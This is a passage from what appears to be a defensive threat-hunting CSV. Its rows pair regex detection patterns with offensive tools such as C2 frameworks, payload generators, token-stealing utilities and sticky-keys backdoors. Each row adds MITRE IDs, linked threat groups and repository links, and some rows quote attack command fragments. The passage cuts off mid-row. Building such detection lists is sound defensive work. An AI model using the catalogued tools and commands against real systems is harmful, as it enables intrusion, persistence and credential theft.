"* ssh-publickey-acceptance.nse*",".{0,1000}\sssh\-publickey\-acceptance\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3360"
"* ssh-run.nse*",".{0,1000}\sssh\-run\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3361"
"* sshv1.nse*",".{0,1000}\ssshv1\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3365"
"* ssl-ccs-injection.nse*",".{0,1000}\sssl\-ccs\-injection\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3366"
"* ssl-cert.nse*",".{0,1000}\sssl\-cert\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3367"
"* ssl-cert-intaddr.nse*",".{0,1000}\sssl\-cert\-intaddr\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3368"
"* ssl-date.nse*",".{0,1000}\sssl\-date\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3369"
"* ssl-dh-params.nse*",".{0,1000}\sssl\-dh\-params\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3370"
"* ssl-enum-ciphers.nse*",".{0,1000}\sssl\-enum\-ciphers\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3371"
"* ssl-heartbleed.nse*",".{0,1000}\sssl\-heartbleed\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3372"
"* ssl-known-key.nse*",".{0,1000}\sssl\-known\-key\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3373"
"* ssl-poodle.nse*",".{0,1000}\sssl\-poodle\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3374"
"* sslv2.nse*",".{0,1000}\ssslv2\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3375"
"* sslv2-drown.nse*",".{0,1000}\ssslv2\-drown\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3376"
"* SspiUacBypass *",".{0,1000}\sSspiUacBypass\s.{0,1000}","offensive_tool_keyword","SspiUacBypass","Bypassing UAC with SSPI Datagram Contexts","T1548.002","TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/SspiUacBypass","1","0","N/A","N/A","10","5","433","56","2023-09-24T17:33:25Z","2023-09-14T20:59:22Z","3377"
"* sstp-discover.nse*",".{0,1000}\ssstp\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3378"
"* st client wss://*",".{0,1000}\sst\sclient\swss\:\/\/.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1548.002 - T1134.001 - T1087.002 - T1010 - T1547.001 - T1059.001 - T1059.003 - T1059.006 - T1543.003 - T1555.003 - T1555.004 - T1546.001 - T1546.003 - T1546.015 - T1041 - T1083 - T1564.003 - T1562.001 - T1562.003 - T1070 - T1070.004 - T1105 - T1056.001 - T1056.002 - T1556 - T1112 - T1106 - T1046 - T1135 - T1003.001 - T1069.001 - T1069.002 - T1057 - T1055 - T1012 - T1021.003 - T1021.006 - T1018 - T1113 - T1518.001 - T1558.003 - T1082 - T1033 - T1007 - T1124 - T1552.006 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/byt3bl33d3r/SILENTTRINITY","1","0","N/A","N/A","N/A","10","2239","416","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z","3379"
"* st teamserver *",".{0,1000}\sst\steamserver\s.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1548.002 - T1134.001 - T1087.002 - T1010 - T1547.001 - T1059.001 - T1059.003 - T1059.006 - T1543.003 - T1555.003 - T1555.004 - T1546.001 - T1546.003 - T1546.015 - T1041 - T1083 - T1564.003 - T1562.001 - T1562.003 - T1070 - T1070.004 - T1105 - T1056.001 - T1056.002 - T1556 - T1112 - T1106 - T1046 - T1135 - T1003.001 - T1069.001 - T1069.002 - T1057 - T1055 - T1012 - T1021.003 - T1021.006 - T1018 - T1113 - T1518.001 - T1558.003 - T1082 - T1033 - T1007 - T1124 - T1552.006 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/byt3bl33d3r/SILENTTRINITY","1","0","N/A","N/A","N/A","10","2239","416","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z","3380"
"* --stack-name catspin *",".{0,1000}\s\-\-stack\-name\scatspin\s.{0,1000}","offensive_tool_keyword","catspin","Catspin rotates the IP address of HTTP requests making IP based blocks or slowdown measures ineffective. It is based on AWS API Gateway and deployed via AWS Cloudformation.","T1027 - T1071 - T1047 - T1090","TA0042 - TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/rootcathacking/catspin","1","0","N/A","N/A","9","3","261","32","2024-03-01T09:25:02Z","2022-07-26T08:08:33Z","3381"
"* --stageless --dotnetver * --payload *",".{0,1000}\s\-\-stageless\s\-\-dotnetver\s.{0,1000}\s\-\-payload\s.{0,1000}","offensive_tool_keyword","SharpShooter","Payload Generation Framework","T1027 - T1059","TA0042","N/A","N/A","Resource Development","https://github.com/mdsecactivebreach/SharpShooter","1","0","N/A","N/A","10","10","1859","361","2024-08-21T12:09:54Z","2018-03-06T20:04:20Z","3382"
"* -stageless -Ix64 *.bin -Ix86 *.bin -P Inject -O *.js*",".{0,1000}\s\-stageless\s\-Ix64\s.{0,1000}\.bin\s\-Ix86\s.{0,1000}\.bin\s\-P\sInject\s\-O\s.{0,1000}\.js.{0,1000}","offensive_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059 - T1204 - T1547","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/optiv/Ivy","1","0","N/A","N/A","10","8","744","129","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z","3383"
"* -stageless -Ix64 *.bin -Ix86 *.bin -P Inject -process64 *.exe -O *.js*",".{0,1000}\s\-stageless\s\-Ix64\s.{0,1000}\.bin\s\-Ix86\s.{0,1000}\.bin\s\-P\sInject\s\-process64\s.{0,1000}\.exe\s\-O\s.{0,1000}\.js.{0,1000}","offensive_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059 - T1204 - T1547","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/optiv/Ivy","1","0","N/A","N/A","10","8","744","129","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z","3384"
"* -stageless -Ix64 *.bin -Ix86 *.bin -P Inject -unhook -O *.js*",".{0,1000}\s\-stageless\s\-Ix64\s.{0,1000}\.bin\s\-Ix86\s.{0,1000}\.bin\s\-P\sInject\s\-unhook\s\-O\s.{0,1000}\.js.{0,1000}","offensive_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059 - T1204 - T1547","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/optiv/Ivy","1","0","N/A","N/A","10","8","744","129","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z","3385"
"* -stageless -Ix64 *.bin -Ix86 *.bin -P Local -O *.js*",".{0,1000}\s\-stageless\s\-Ix64\s.{0,1000}\.bin\s\-Ix86\s.{0,1000}\.bin\s\-P\sLocal\s\-O\s.{0,1000}\.js.{0,1000}","offensive_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059 - T1204 - T1547","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/optiv/Ivy","1","0","N/A","N/A","10","8","744","129","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z","3386"
"* -stageless -Ix64 *.bin -Ix86 *.bin -P Local -unhook -O *.js*",".{0,1000}\s\-stageless\s\-Ix64\s.{0,1000}\.bin\s\-Ix86\s.{0,1000}\.bin\s\-P\sLocal\s\-unhook\s\-O\s.{0,1000}\.js.{0,1000}","offensive_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059 - T1204 - T1547","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/optiv/Ivy","1","0","N/A","N/A","10","8","744","129","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z","3387"
"* start covenant*",".{0,1000}\sstart\scovenant.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","0","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","3388"
"* start gs-sshd*",".{0,1000}\sstart\sgs\-sshd.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","3389"
"* start_campaign.py*",".{0,1000}\sstart_campaign\.py.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021  -  T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","Black Basta","C2","https://github.com/ahmedkhlief/Ninja","1","0","N/A","N/A","10","10","806","170","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z","3393"
"* start_hidden_process*",".{0,1000}\sstart_hidden_process.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","3394"
"* Starting Adaptive C2 Server on *",".{0,1000}\sStarting\sAdaptive\sC2\sServer\son\s.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","#content","N/A","10","10","N/A","N/A","N/A","N/A","3395"
"* Starting Badger Notification Handler for %s => {LHOST}:{LPORT}*",".{0,1000}\sStarting\sBadger\sNotification\sHandler\sfor\s\%s\s\=\>\s\{LHOST\}\:\{LPORT\}.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","#content","N/A","10","10","N/A","N/A","N/A","N/A","3396"
"* Starting external c2 server on *",".{0,1000}\sStarting\sexternal\sc2\sserver\son\s.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","#content","N/A","10","10","N/A","N/A","N/A","N/A","3397"
"* Starting pre2k spray against *",".{0,1000}\sStarting\spre2k\sspray\sagainst\s.{0,1000}","offensive_tool_keyword","Invoke-Pre2kSpray","Enumerate domain machine accounts and perform pre2k password spraying.","T1087.002 - T1110.003","TA0007 - TA0006","N/A","N/A","Credential Access","https://github.com/eversinc33/Invoke-Pre2kSpray","1","0","#content","N/A","8","1","69","11","2023-07-14T06:50:22Z","2023-07-05T10:07:38Z","3398"
"* -start-keylogger*",".{0,1000}\s\-start\-keylogger.{0,1000}","offensive_tool_keyword","canisrufus","A stealthy Python based Windows backdoor that uses Github as a command and control server","T1105 - T1071 - T1027","TA0003 - TA0011 - TA0005 - TA0010","N/A","Black Basta","C2","https://github.com/maldevel/canisrufus","1","0","N/A","N/A","10","10","263","78","2017-08-15T15:46:20Z","2017-08-12T06:49:40Z","3400"
"* status gs-sshd*",".{0,1000}\sstatus\sgs\-sshd.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","3401"
"* StayKit.cna*",".{0,1000}\sStayKit\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Persistence","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/0xthirteen/StayKit","1","0","N/A","N/A","10","10","475","73","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z","3402"
"* -Steal -ProcessID *",".{0,1000}\s\-Steal\s\-ProcessID\s.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","3403"
"* -Steal -ProcessID *",".{0,1000}\s\-Steal\s\-ProcessID\s.{0,1000}","offensive_tool_keyword","Token-Impersonation","Make a Token (local admin rights not required) or Steal the Token of the specified Process ID (local admin rights required)","T1134.001 - T1134.002","TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/Leo4j/Token-Impersonation","1","0","N/A","N/A","8","1","7","3","2024-03-20T17:07:13Z","2023-11-02T10:46:24Z","3404"
"* steal_token /process:* /command:*",".{0,1000}\ssteal_token\s\/process\:.{0,1000}\s\/command\:.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","N/A","10","1038","201","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z","3405"
"* stealthily grabs  passwords and browser history from windows systems*",".{0,1000}\sstealthily\sgrabs\s\spasswords\sand\sbrowser\shistory\sfrom\swindows\ssystems.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z","3407"
"* stickykey.ps1*",".{0,1000}\sstickykey\.ps1.{0,1000}","offensive_tool_keyword","Persistence-Accessibility-Features","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/Ignitetechnologies/Persistence-Accessibility-Features","1","0","N/A","N/A","9","1","34","12","2020-05-18T05:59:58Z","2020-05-18T05:59:23Z","3408"
"* Stickykeys.sh*",".{0,1000}\sStickykeys\.sh.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z","3409"
"* Stompy.ps1*",".{0,1000}\sStompy\.ps1.{0,1000}","offensive_tool_keyword","Stompy","Timestomp Tool to flatten MAC times with a specific timestamp","T1070.006","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZephrFish/Stompy","1","0","N/A","N/A","10","1","46","6","2023-10-15T17:38:23Z","2023-10-14T23:40:32Z","3410"
"* StomPY.py *",".{0,1000}\sStomPY\.py\s.{0,1000}","offensive_tool_keyword","Stompy","Timestomp Tool to flatten MAC times with a specific timestamp","T1070.006","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZephrFish/Stompy","1","0","N/A","N/A","10","1","46","6","2023-10-15T17:38:23Z","2023-10-14T23:40:32Z","3411"
"* stop covenant*",".{0,1000}\sstop\scovenant.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","0","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","3412"
"* -stop-keylogger*",".{0,1000}\s\-stop\-keylogger.{0,1000}","offensive_tool_keyword","canisrufus","A stealthy Python based Windows backdoor that uses Github as a command and control server","T1105 - T1071 - T1027","TA0003 - TA0011 - TA0005 - TA0010","N/A","Black Basta","C2","https://github.com/maldevel/canisrufus","1","0","N/A","N/A","10","10","263","78","2017-08-15T15:46:20Z","2017-08-12T06:49:40Z","3415"
"* striker.py*",".{0,1000}\sstriker\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - 